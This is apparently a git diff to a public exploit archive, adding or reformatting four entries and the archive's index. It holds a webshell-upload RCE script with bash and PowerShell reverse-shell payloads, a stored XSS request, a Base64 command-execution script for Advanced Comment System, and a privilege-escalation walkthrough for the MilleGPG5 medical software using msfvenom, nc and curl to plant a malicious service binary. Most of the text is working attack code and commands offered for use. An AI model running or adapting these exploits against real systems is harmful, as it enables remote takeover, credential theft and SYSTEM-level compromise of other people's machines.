diff --git a/exploits/php/webapps/50556.py b/exploits/php/webapps/50556.py index c01411073..c16f1ced8 100755 --- a/exploits/php/webapps/50556.py +++ b/exploits/php/webapps/50556.py @@ -49,11 +49,8 @@ class Exploit: } - #Creates user "bypass" and upload a simple webshell without -authentication - request = self.session.post(url, -data=data,headers=self.headers,files={"image":(self.shell_name -+'.php',"")}) + #Creates user "bypass" and upload a simple webshell without authentication + request = self.session.post(url,data=data,headers=self.headers,files={"image":(self.shell_name +'.php',"")}) time.sleep(3) if (request.status_code == 200): print('[*] The user and webshell were created\n') @@ -69,8 +66,7 @@ data=data,headers=self.headers,files={"image":(self.shell_name #Use a payload in bash to get a reverse shell payload = 'bash+-c+"bash+-i+>%26+/dev/tcp/'+self.LHL+'+0>%261"' - execute_command = -self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: request_rce = requests.get(execute_command) @@ -86,11 +82,9 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload time.sleep(3) #Use a payload in powershell to get a reverse shell - payload = -"""powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) + payload = """powershell+-nop+-c+"$client+%3d+New-Object+System.Net.Sockets.TCPClient("""+self.HPW+""")%3b$stream+%3d+$client.GetStream()%3b[byte[]]$bytes+%3d+0..65535|%25{0}%3bwhile(($i+%3d+$stream.Read($bytes,+0,+$bytes.Length))+-ne+0) {%3b$data+%3d+(New-Object+-TypeName+System.Text.ASCIIEncoding).GetString($bytes,0,+$i)%3b$sendback+%3d+(iex+$data+2>%261+|+Out-String+)%3b$sendback2+%3d+$sendback+%2b+'PS+'+%2b+(pwd).Path+%2b+'>+'%3b$sendbyte+%3d+([text.encoding]%3a%3aASCII).GetBytes($sendback2)%3b$stream.Write($sendbyte,0,$sendbyte.Length)%3b$stream.Flush()}%3b$client.Close()""""" - execute_command = -self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload + execute_command = self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload try: @@ -105,8 +99,7 @@ self.target+'/uploadImage/Profile/'+self.shell_name+'.php?cmd='+payload def get_args(): - parser = argparse.ArgumentParser(description='Laundry Booking -Management System') + parser = argparse.ArgumentParser(description='Laundry Booking Management System') parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url') parser.add_argument('-s', '--shell_name', dest="shell_name", diff --git a/exploits/php/webapps/50557.txt b/exploits/php/webapps/50557.txt new file mode 100644 index 000000000..13bdeaafc --- /dev/null +++ b/exploits/php/webapps/50557.txt @@ -0,0 +1,68 @@ +# Exploit Title: Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting +# Date: 2021-08-31 +# Exploit Author: Tushar Jadhav +# Vendor Homepage: https://www.sourcecodester.com/ +# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html +# Version: 1.0 +# Tested on: Windows 11 +# Contact: https://www.linkedin.com/in/tushar-jadhav-7a43b4171/ +# CVE: CVE-2021-40577 + +============================================================================================================================= + +Stored Cross-site scripting(XSS): + +Stored attacks are those where the injected script is permanently stored on +the target servers, +such as in a database, in a message forum, visitor log, comment field, etc. +The victim then retrieves the malicious script from the server when it +requests the stored information. +Stored XSS is also sometimes referred to as Persistent XSS. + +============================================================================================================================== + +Attack vector: + +This vulnerability can result in the attacker can injecting the XSS payload +in the User Registration section. Each time the admin login or basic user +Login in the admin panel, the XSS triggers and attacker can able to steal +the cookie according to the crafted payload. + +=============================================================================================================================== + +Vulnerable Parameters: Name + +=============================================================================================================================== + +Steps for reproducing: + +1. Go to add users section +2. fill in the details. & put +payload in Name parameter. +3. Once we click on save, We can see the XSS has been triggered. + +================================================================================================================================ + +Request : + +POST /onlineenrolmentsystem/admin/user/controller.php?action=add HTTP/1.1 +Host: 192.168.1.205:81 +Content-Length: 133 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.205:81 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 +(KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: +http://192.168.1.205:81/onlineenrolmentsystem/admin/user/index.php?view=add +Accept-Encoding: gzip, deflate +Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 +Cookie: PHPSESSID=uonlna5pmhqh9shnj8t6oqc2g3 +Connection: close + +deptid=&U_NAME=%3Cscript%3Ealert%28window.origin%29%3C%2Fscript%3E&deptid=&U_USERNAME=test&deptid=&U_PASS=root&U_ROLE=Registrar&save= + +=================================================================================================================================== \ No newline at end of file diff --git a/exploits/php/webapps/50559.py b/exploits/php/webapps/50559.py new file mode 100755 index 000000000..54f81c734 --- /dev/null +++ b/exploits/php/webapps/50559.py @@ -0,0 +1,65 @@ +# Exploit Title: Advanced Comment System 1.0 - Remote Command Execution (RCE) +# Date: November 30, 2021 +# Exploit Author: Nicole Daniella Murillo Mejias +# Version: Advanced Comment System 1.0 +# Tested on: Linux + +#!/usr/bin/env python3 + +# DESCRIPTION: +# Commands are Base64 encoded and sent via POST requests to the vulnerable application, the +# response is filtered by the randomly generated alphanumeric string and only command output +# is displayed. +# +# USAGE: +# Execute the script and pass the command to execute as arguments, they can be quoted or unquoted +# If any special characters are used, they should be quoted with single quotes. +# +# Example: +# +# python3 acspoc.py uname -a +# python3 acspoc.py 'bash -i >& /dev/tcp/127.0.0.1/4444 0>&1' + +import sys +import base64 +import requests +import random + +def generate_string(size): + str = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789" + return ''.join(random.choice(str) for i in range(size)) + +def exploit(cmd): + + # TODO: Change the URL to the target host + url = 'http://127.0.0.1/advanced_comment_system/index.php' + + headers = {'Content-Type': 'application/x-www-form-urlencoded'} + + encoded_cmd = base64.b64encode(cmd) + + delimiter = generate_string(6).encode() + + body = b'ACS_path=php://input%00&cbcmd=' + body += encoded_cmd + body += b'&' + + try: + result = requests.post(url=url, headers=headers, data=body) + except KeyboardInterrupt: + print("Keyboard interrupt detected.") + sys.exit() + + if f'{delimiter.decode()}: ' in result.text: + position = result.text.find(f"{delimiter.decode()}:") + len(f"{delimiter.decode()}: ") + + if len(result.text[position:]) > 0: + print(result.text[position:]) + else: + print(f"No output from command '{cmd.decode()}'") + print(f"Response size from target host: {len(result.text)} bytes") + +if __name__ == "__main__": + exploit(' '.join(sys.argv[1:]).encode()) \ No newline at end of file diff --git a/exploits/windows/local/50558.txt b/exploits/windows/local/50558.txt new file mode 100644 index 000000000..8a7f596ed --- /dev/null +++ b/exploits/windows/local/50558.txt @@ -0,0 +1,126 @@ +# Exploit Title: MilleGPG5 5.7.2 Luglio 2021 (x64) - Local Privilege Escalation +# Date: 2021-07-19 +# Author: Alessandro 'mindsflee' Salzano +# Vendor Homepage: https://millegpg.it/ +# Software Homepage: https://millegpg.it/ +# Software Link: https://www.millegpg.it/download/MilleGPGInstall.exe +# Version: 5.7.2 +# Tested on: Microsoft Windows 10 Enterprise x64 + +MilleGPG5 is a Class 1 Medical Device registered with "Ministero della Salute". + +Vendor: Millennium S.r.l. / Dedalus Group / Dedalus Italia S.p.a. + +Affected version: MilleGPG5 5.7.2 + +# Details +# By default the Authenticated Users group has the modify permission to MilleGPG5 folders/files as shown below. +# A low privilege account is able to rename the mysqld.exe file located in bin folder and replace +# with a malicious file that would connect back to an attacking computer giving system level privileges +# (nt authority\system) due to the service running as Local System. +# While a low privilege user is unable to restart the service through the application, a restart of the +# computer triggers the execution of the malicious file. + +(1) Impacted services. +Any low privileged user can elevate their privileges abusing these services: + +C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe +C:\Program Files\MilleGPG5\GPGService.exe + + + Details: + + +SERVICE_NAME: MariaDB-GPG + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program +Files\MilleGPG5\MariaDB\bin\mysqld.exe" MariaDB-GPG + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : MariaDB-GPG + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +------ + +SERVICE_NAME: GPGOrchestrator + TYPE : 10 WIN32_OWN_PROCESS + START_TYPE : 2 AUTO_START + ERROR_CONTROL : 1 NORMAL + BINARY_PATH_NAME : "C:\Program Files\MilleGPG5\GPGService.exe" + LOAD_ORDER_GROUP : + TAG : 0 + DISPLAY_NAME : GPG Orchestrator + DEPENDENCIES : + SERVICE_START_NAME : LocalSystem + +(2) Folder permissions. +Insecure folders permissions issue: + + +C:\Program Files\MilleGPG5\MariaDB\bin BUILTIN\Users:(I)(OI)(CI)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT +SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT +AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) +BUILTIN\Administrators:(I)(F) +BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) +BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + APPLICATION PACKAGE +AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE +AUTHORITY\ALL APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + APPLICATION PACKAGE +AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE +AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + ...[SNIP]... +--------------- + +C:\Program Files\MilleGPG5 BUILTIN\Users:(OI)(CI)(F) + NT SERVICE\TrustedInstaller:(I)(F) + NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F) + NT AUTHORITY\SYSTEM:(I)(F) + NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F) + BUILTIN\Administrators:(I)(F) +BUILTIN\Administrators:(I)(OI)(CI)(IO)(F) + BUILTIN\Users:(I)(RX) + BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE) + CREATOR OWNER:(I)(OI)(CI)(IO)(F) + APPLICATION PACKAGE AUTHORITY\ALL +APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL +APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED +APPLICATION PACKAGES:(I)(RX) + APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED +APPLICATION PACKAGES:(I)(OI)(CI)(IO)(GR,GE) + + + # Proof of Concept + +1. Generate malicious .exe on attacking machine + msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.102 LPORT=4242 -f exe > /var/www/html/mysqld_evil.exe + +2. Setup listener and ensure apache is running on attacking machine + nc -lvp 4242 + service apache2 start + +3. Download malicious .exe on victim machine + type on cmd: curl http://192.168.1.102/mysqld_evil.exe -o "C:\Program Files\MilleGPG5\MariaDB\bin\mysqld_evil.exe" + +4. Overwrite file and copy malicious .exe. + Renename C:\Program Files\MilleGPG5\MariaDB\bin\mysqld.exe > mysqld.bak + Rename downloaded 'mysqld_evil.exe' file in mysqld.exe + +5. Restart victim machine + +6. Reverse Shell on attacking machine opens + C:\Windows\system32>whoami + whoami + nt authority\system \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f5ce15abe..948e78a50 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11421,6 +11421,7 @@ id,file,description,date,author,type,platform,port 50517,exploits/windows/local/50517.txt,"Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation",1970-01-01,"Marcio Mendes",local,windows, 50541,exploits/linux/local/50541.c,"Linux Kernel 5.1.x - 'PTRACE_TRACEME' pkexec Local Privilege Escalation (2)",1970-01-01,"Ujas Dhami",local,linux, 50545,exploits/windows/local/50545.txt,"HTTPDebuggerPro 9.11 - Unquoted Service Path",1970-01-01,"Aryan Chehreghani",local,windows, +50558,exploits/windows/local/50558.txt,"MilleGPG5 5.7.2 Luglio 2021 - Local Privilege Escalation",1970-01-01,"Alessandro Salzano",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44645,3 +44646,5 @@ id,file,description,date,author,type,platform,port 50554,exploits/multiple/webapps/50554.txt,"orangescrum 1.8.0 - 'Multiple' Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,"Hubert Wojciechowski",webapps,multiple, 50555,exploits/php/webapps/50555.txt,"opencart 3.0.3.8 - Sessjion Injection",1970-01-01,"Hubert Wojciechowski",webapps,php, 50556,exploits/php/webapps/50556.py,"Laundry Booking Management System 1.0 - Remote Code Execution (RCE)",1970-01-01,"Pablo Santiago",webapps,php, +50557,exploits/php/webapps/50557.txt,"Online Enrollment Management System in PHP and PayPal 1.0 - 'U_NAME' Stored Cross-Site Scripting",1970-01-01,"Tushar Jadhav",webapps,php, +50559,exploits/php/webapps/50559.py,"Advanced Comment System 1.0 - Remote Command Execution (RCE)",1970-01-01,"Murillo Mejias",webapps,php,